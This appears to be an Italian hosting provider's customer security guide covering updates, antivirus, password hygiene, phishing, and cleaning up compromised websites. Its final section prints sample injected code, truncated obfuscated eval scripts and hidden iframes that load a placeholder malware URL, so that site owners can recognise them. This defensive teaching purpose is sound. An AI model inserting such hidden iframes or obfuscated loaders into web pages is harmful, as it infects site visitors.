PRATICHE DI SICUREZZA GENERICHE
- Tenere aggiornato il sistema operativo. Spesso i Malware cercano di sfruttare vecchie vulnerabilità note ed è per questo che gli aggiornamenti regolari possono aiutare molto.
- Tenere aggiornato il software, in particolare il browser (Internet Explorer, Firefox, etc) ed altri programmi comuni quali Adobe Acrobat Reader. Anche questi software presentano spesso vulnerabilità note delle vecchie versioni e rappresentano un facile ingresso se non aggiornati.
- Tenere aggiornato il proprio antivirus e lanciare periodicamente una scansione completa, possibilmente anche con più di un software perché purtroppo non sempre un singolo software e’ in grado di rilevare tutti i tipi di Malware in circolazione. Per scegliere il programma da utilizzare sono disponibili alcuni siti che effettuano analisi comparative, tra cui http://www.av-comparatives.org/ su cui vengono periodicamente pubblicati dei test.
- Tenere sempre attivo un firewall a protezione della connessione internet. Meglio ancora se un firewall evoluto che mostra notifiche ogni volta che un programma presente nel PC tenta di inviare dati su internet (le password raccolte devono essere prima o poi inviate all’attaccante). Per scegliere il Firewall da utilizzare sono disponibili alcuni siti che effettuano analisi comparative, tra cui http://www.matousec.com/projects/firewall-challenge/
- Cambiare le proprie password ogni 3 mesi al massimo, per tutti i propri servizi, non solo Aruba Business.
PRATICHE DI SICUREZZA SPECIFICHE PER MALWARE
- Non lanciare allegati eseguibili ricevuti tramite posta elettronica, neanche se provengono da mittenti conosciuti (che potrebbero avere il PC compromesso).
- Non cliccare sui link sospetti ricevuti tramite social network (facebook, twitter, etc) o tramite instant messaging. In particolare quelli che invitano a scaricare accattivanti e utili software per tenere sotto controllo i propri amici o funzioni del genere.
- Non fornire mai i propri dati di accesso rispondendo a messaggi email che li richiedono per via di fantomatici aggiornamenti di database o perdita sul server o blocco del conto. E’ quasi impossibile che un fornitore di servizi richieda ai propri clienti la password, meno ancora via email.
- Non scaricare e non eseguire software contraffatto o crack di software originale: anche se apparentemente funzionanti, questi software includono quasi sempre un virus o Malware o trojan horse al loro interno e spesso vengono messi in circolazione proprio per questo.
- Non salvare sul proprio PC password e dati di accesso e non utilizzare le funzioni ricorda password. Digitare la password ogni volta è più scomodo, ma molto più sicuro: il Malware esegue infatti una scansione sul PC dove molti software (ad esempio Filezilla) salvano una copia più o meno protetta dei dati di accesso memorizzati.
- Usare sempre i protocolli sicuri messi a disposizione da Aruba Business, come https, smtps, pop3s, imaps. In questo modo i dati di accesso transiteranno su internet non in chiaro, ma protetti dalla crittografia: anche se intercettati risulteranno illeggibili.
- Controllare il codice della propria Home Page, uno dei metodi di diffusione del Malware prevede l’utilizzo dei dati di accesso FTP raccolti sui PC infetti per compromettere i siti web relativi e tramite essi far scaricare il Malware stesso a tutti i visitatori. Questo in genere viene fatto inserendo del codice Javascript offuscato all’interno della HomePage del sito: la pagina mantiene il proprio aspetto e funzionamento, ma a ogni apertura tenterà di far scaricare al visitatore file infetti provenienti da altri siti ancora, reindirizzando sempre il browser di un generico visitatore sulla pagina esterna richiamata dal codice.
Per non incorrere in problemi di sicurezza sulle pagine del proprio sito è necessario mantenere in sicurezza le applicazioni web pubblicate. E' infatti possibile che pagine il cui codice non sia scritto in modo sicuro siano vulnerabili a vari tipi di attacchi, quali XSS o SQL injection. Questo tipo di vulnerabilità sono indipendenti dalla sicurezza del webserver, in quanto vengono sfruttate con normali richieste HTTP, appositamente formate per utilizzare il codice delle pagine web in modo fraudolento. Le misure da seguire per la sicurezza si differenziano a seconda che si tratti di:
APPLICAZIONI SVILUPPATE DA TERZI
Per pubblicare il proprio sito è possibile trovare in rete una moltitudine di applicazioni preconfezionate, scritte in vari linguaggi, e con supporto a diversi tipi di Database. Le tipologie di questi applicativi comprendono forum, ecommerce, webmail, guestbook e molto altro ancora. Tali applicativi possono presentare vulnerabilità di vario genere, per prevenire i possibili attacchi verificare periodicamente la presenza di versioni aggiornate delle applicazioni utilizzate, in genere gli aggiornamenti sono disponibili direttamente dalla Home Page dello sviluppatore. Per essere efficaci gli aggiornamenti vanno ripetuti almeno una volta al mese. Non sempre, però, un'applicazione aggiornata alla sua ultima versione è sicura.
ATTENZIONE: Nel caso in cui una delle applicazioni che si sta utilizzando non sia attualmente sicura
si consiglia di sospenderne l’utilizzo o di cercare altra applicazione similare non affetta da vulnerabilità.
Di seguito un elenco di consigli:
- La prima cosa da fare è rimuovere tutto il codice malevolo eventualmente presente nelle pagine web dei propri siti;
- Nel caso si pensi che il proprio PC sia infetto sono disponibili anche numerosi tool per la scansione online del computer, ad esempio tra i più conosciuti:
https://www.trendmicro.com/it_it/forHome/products/housecall.html
https://www.f-secure.com/it/home/support
https://www.broadcom.com/products/cyber-security
- Verificare eventuali infezioni presenti nel proprio computer. Nel caso in cui per la pubblicazione del sito ci si avvalga di collaboratori e/o webmaster, verificare l'integrità di tutti i computer utilizzati. E' sufficiente che uno solo di questi sia vulnerabile o infetto per subire il furto delle credenziali di accesso;
- Verificare se sono disponibili aggiornamenti per le applicazioni web utilizzate. Spesso, infatti, queste presentano vulnerabilità nelle vecchie versioni e rappresentano quindi un facile ingresso se non aggiornate;
- Ripulire i PC infetti tramite antivirus ed antiMalware, e attivare le opportune protezioni per evitare il ripetersi di simili problemi;
- Dopo aver messo in sicurezza ogni computer utilizzato, procedere con il cambio di tutte le credenziali di accesso utilizzate in precedenza. Anche se non ci è possibile dare indicazioni sicure sui dati di accesso di servizi non gestiti da Aruba (home banking, social network etc...) è assolutamente consigliabile cambiare anche tali dati, rivolgendosi eventualmente ai rispettivi fornitori del servizio.
ATTENZIONE: Nel caso in cui alla verifica del proprio computer non si individuino Malware attivi
è comunque necessario effettuare il cambio delle credenziali di accesso in quanto quelle utilizzate in precedente potrebbero essere compromesse.
Di seguito un elenco dei Software più utilizzati per la rimozione di Malware e Virus:
Per Piattaforma Windows e Linux
- Zeus trojan Remover v1.2.0 www.novirusthanks.org
- Malwarebytes https://www.malwarebytes.com
Antivirus e Firewall:
Per chi utilizza sistemi Windows, Linux e Unix
- Avira https://www.avira.com/it
Di seguito alcuni esempi di codice che, attraverso applicazioni web vulnerabili o furto delle proprie credenziali di accesso al sito, può essere inserito nelle pagine web del proprio sito:
<script>function v47e ...etc... 4950543E'));</script>
<iframe src='http://url_contenente_malware' width='1' height='1' style='visibility: hidden;'></iframe>
<script language="javascript">$= ...etc... ;eval(unescape($));document.write($);</script>
<!-- ~ --><div style="visibility:hidden"><iframe src="http://url_contenente_malware" width=100 height=80></iframe></div><!-- ~ -->
In genere questi codici hanno una o più delle seguenti caratteristiche:
- Proprietà -visibility: hidden- per risultare non visibili nella normale navigazione del sito;
- Utilizzano una codifica per nascondere il loro contenuto durante la lettura della pagina sorgente;
- Richiamano pagine esterne ai Server Aruba Business, generalmente pagine che risiedono su server compromessi e contenenti malware.